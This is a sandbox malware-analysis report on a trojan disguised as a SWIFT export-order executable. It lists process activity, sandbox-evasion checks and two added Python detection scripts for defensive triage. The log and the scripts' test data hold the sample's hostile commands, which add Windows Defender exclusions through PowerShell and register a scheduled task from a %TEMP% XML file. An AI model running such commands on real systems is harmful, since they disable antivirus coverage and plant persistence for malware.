          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe"
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp"
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
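          The process tree above carries three detection-grade signals in plain command lines: powershell.exe adding Windows Defender exclusions for two user-writable paths (the sample and its dropped copy), schtasks.exe creating a task from an XML file in AppData\Local\Temp, and a user-path executable launching help.exe and autochk.exe with no arguments at all, the usual shape of a hollowing target. Note that the image paths are under SysWOW64 while the quoted command lines say System32: the 32-bit parent is subject to WoW64 file-system redirection, so a rule that matches only on the literal System32 path misses both. The script below is an added example, not Joe Sandbox or Sigma code; it encodes those three rules (plus the self-respawn) over Sysmon-style ParentImage/Image/CommandLine events constructed from the rows above, and is written so the same rules run unchanged over a real event feed.

```python
"""Rule set for process-creation events (Sysmon Event ID 1 shape).

Added example. EVENTS is constructed from the report rows above; the
field names follow Sysmon's ParentImage / Image / CommandLine.
"""
import re

USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
SYSTEM_DIR = re.compile(r"^[A-Za-z]:\\Windows\\(System32|SysWOW64)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
EXCL_RE = re.compile(r'-ExclusionPath\s+"([^"]+)"|-ExclusionPath\s+(\S+)', re.I)
XML_RE = re.compile(r'/XML\s+"([^"]+)"|/XML\s+(\S+)', re.I)

SAMPLE = r"C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "%s"'

# Constructed from the report's "Process created" rows (first event has no parent row).
EVENTS = [
    {"ParentImage": "", "Image": SAMPLE, "CommandLine": '"%s"' % SAMPLE},
    {"ParentImage": SAMPLE, "Image": PS, "CommandLine": PS_CMD % SAMPLE},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ParentImage": SAMPLE, "Image": PS,
     "CommandLine": PS_CMD % r"C:\Users\user\AppData\Roaming\AnsPejV.exe"},
    {"ParentImage": SAMPLE, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp"'},
    {"ParentImage": SAMPLE, "Image": SAMPLE, "CommandLine": SAMPLE},
    {"ParentImage": SAMPLE, "Image": r"C:\Windows\SysWOW64\autochk.exe",
     "CommandLine": r"C:\Windows\SysWOW64\autochk.exe"},
    {"ParentImage": SAMPLE, "Image": r"C:\Windows\SysWOW64\help.exe",
     "CommandLine": r"C:\Windows\SysWOW64\help.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def first_group(match):
    return next(g for g in match.groups() if g)


def arguments(image, cmd):
    """Command line minus the program path; tolerates an unquoted path with spaces."""
    c = cmd.strip()
    if c.startswith('"'):
        end = c.find('"', 1)
        return c[end + 1:].strip() if end > 0 else ""
    if c.lower().startswith(image.lower()):
        return c[len(image):].strip()
    return c.split(" ", 1)[1] if " " in c else ""


def evaluate(ev):
    """Return (rule, severity, detail) findings for one event."""
    parent, image, cmd = ev["ParentImage"], ev["Image"], ev["CommandLine"]
    findings = []
    name = basename(image)

    # Defender exclusion added; worst when the excluded path is user-writable.
    if name in ("powershell.exe", "pwsh.exe"):
        m = EXCL_RE.search(cmd)
        if m:
            path = first_group(m)
            sev = "high" if USER_WRITABLE.match(path) else "medium"
            findings.append(("defender_exclusion_added", sev, path))

    # Scheduled task created from an XML definition dropped in %TEMP%.
    if name == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = XML_RE.search(cmd)
        if m and TEMP_DIR.search(first_group(m)):
            findings.append(("scheduled_task_from_temp_xml", "high", first_group(m)))

    # System binary started with an empty argument list by a user-path parent:
    # the shape of a process started suspended to be hollowed.
    if SYSTEM_DIR.match(image) and USER_WRITABLE.match(parent) and not arguments(image, cmd):
        findings.append(("bare_system_binary_from_user_path", "high", image))

    # A user-path executable re-launching its own image (self-injection stage).
    if parent and image.lower() == parent.lower() and USER_WRITABLE.match(parent):
        findings.append(("self_respawn", "low", image))

    return findings


def triage(events):
    return [(ev["Image"], f) for ev in events for f in evaluate(ev)]


if __name__ == "__main__":
    for image, finding in triage(EVENTS):
        print(basename(image), finding)
```

          Matching on `-ExclusionPath` alone is enough for this sample, but Add-MpPreference also takes -ExclusionProcess and -ExclusionExtension; a production rule should cover all three, and the bare-system-binary rule should be tuned against the handful of utilities that legitimately run without arguments on a given estate.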
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | File created: C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@16/10@9/4
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Mutant created: \Sessions\1\BaseNamedObjects\Yjstdec
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_01
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: /UTF8Encodi;component/views/addbook.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: views/addcustomer.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: views/addbook.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: /UTF8Encodi;component/views/addcustomer.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: /UTF8Encodi;component/views/addbook.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: views/addbook.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: views/addcustomer.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: /UTF8Encodi;component/views/addcustomer.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: Q/UTF8Encodi;component/views/addbook.xamlg/UTF8Encodi;component/views/borrowfrombookview.xaml]/UTF8Encodi;component/views/borrowingview.xamlW/UTF8Encodi;component/views/changebook.xaml_/UTF8Encodi;component/views/changecustomer.xaml[/UTF8Encodi;component/views/customerview.xaml_/UTF8Encodi;component/views/deletecustomer.xamlU/UTF8Encodi;component/views/errorview.xamlY/UTF8Encodi;component/views/smallextras.xamlY/UTF8Encodi;component/views/addcustomer.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
          Source: Binary string: help.pdbGCTL source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: AnsPejV.exe.0.dr, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.7e0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.7e0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.7.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.3.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.9.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.5.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_007E92F5 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_007E9361 push ds; retf
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_007E9347 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_052A56E0 push esp; iretd
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B842 push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B84B push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C871 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00415022 push ebx; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C027 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B8E6 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B8AC push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00406124 push edx; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C196 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004151AC push 53C4372Dh; iretd
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BB0C push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00419B23 push esp; iretd
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BC18 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00414CAE push ds; retf
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C575 push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C6BB push 67D4EBBAh; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041B7F5 push eax; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_008F92F5 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_008F9347 push ds; ret
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_008F9361 push ds; retf
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0141D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC871 push 67D4EBBAh; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CB84B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CB842 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC027 push 67D4EBBAh; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C5022 push ebx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85893644673
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85893644673
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile created: C:\Users\user\AppData\Roaming\AnsPejV.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
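A responder triaging the schtasks line above wants two answers quickly: where the task definition came from, and what the task runs. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses the command line as recorded (tolerating the quote the sandbox dropped from the /XML path), parses a Task Scheduler XML definition, and flags a definition staged in a user-writable directory, an action that executes from one, and a task hidden from the UI. The task XML is constructed for illustration, because the report does not include tmp3FD.tmp; pointing its action at the AnsPejV.exe file the report lists as dropped is an assumption about this sample's task, not something the report states.

```python
"""Triage of a schtasks /Create persistence attempt (added example).

Parses the schtasks.exe command line as a sandbox or EDR records it and,
optionally, the Task Scheduler XML it registered, and reports the indicators
a responder checks first. Standard library only.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# Namespace used by every Task Scheduler 2.0 XML definition.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories an unprivileged user can write to. A task that is registered
# from, or executes out of, one of these is the pattern seen in this report.
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop)\\"
    r"|[a-z]:\\programdata\\"
    r"|[a-z]:\\windows\\temp\\)",
    re.IGNORECASE,
)

# /TN, /XML and /TR values, quoted or bare. Sandbox logs often lose a quote
# (the recorded line has no closing quote on the /XML path), so a bare token
# is accepted too and stray quotes are stripped afterwards.
_SWITCH = re.compile(r'/(tn|xml|tr)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)

# Command line exactly as recorded in the report above.
REPORTED_CMDLINE = (
    'C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\AnsPejV" '
    '/XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmp3FD.tmp'
)

# Constructed task definition (assumption: the report does not contain
# tmp3FD.tmp; this one runs the file the report lists as dropped). Real
# exports carry a UTF-16 XML declaration: decode the bytes to str and drop
# the declaration before handing the text to ElementTree.
SAMPLE_TASK_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Settings>
    <Hidden>true</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\AnsPejV.exe</Command>
    </Exec>
  </Actions>
</Task>
""".strip()


def parse_schtasks_cmdline(cmdline: str) -> dict:
    """Return whether this is a /Create and the /TN, /XML and /TR values."""
    info = {"create": re.search(r"/create\b", cmdline, re.IGNORECASE) is not None}
    for m in _SWITCH.finditer(cmdline):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        info[m.group(1).lower()] = value.strip('"')
    return info


def parse_task_xml(xml_text: str) -> dict:
    """Extract the Exec commands and the Hidden setting from a task definition."""
    root = ET.fromstring(xml_text)
    commands = [(c.text or "").strip()
                for c in root.findall(".//t:Actions/t:Exec/t:Command", NS)]
    hidden = root.find(".//t:Settings/t:Hidden", NS)
    return {
        "commands": commands,
        "hidden": hidden is not None and (hidden.text or "").strip().lower() == "true",
    }


def triage(cmdline: str, xml_text: Optional[str] = None) -> List[str]:
    """Findings for one schtasks invocation; empty for anything but /Create."""
    findings: List[str] = []
    cmd = parse_schtasks_cmdline(cmdline)
    if not cmd["create"]:
        return findings
    xml_path = cmd.get("xml")
    if xml_path and USER_WRITABLE.match(xml_path):
        findings.append(f"task definition loaded from user-writable path: {xml_path}")
    tr = cmd.get("tr")
    if tr and USER_WRITABLE.match(tr):
        findings.append(f"task action executes from user-writable path: {tr}")
    if xml_text is not None:
        task = parse_task_xml(xml_text)
        for command in task["commands"]:
            if USER_WRITABLE.match(command.strip('"')):
                findings.append(f"task action executes from user-writable path: {command}")
        if task["hidden"]:
            findings.append("task is hidden from the Task Scheduler UI")
    return findings


if __name__ == "__main__":
    for finding in triage(REPORTED_CMDLINE, SAMPLE_TASK_XML):
        print(finding)
```

On a live host the same checks apply to the task files under C:\Windows\System32\Tasks, which are the registered XML definitions, so the /XML staging file in %TEMP% being gone by the time you look does not stop the analysis.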
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.2cd9004.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: TT_SWIFT_Export Order_noref S10SMG00318021.exe PID: 3456, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
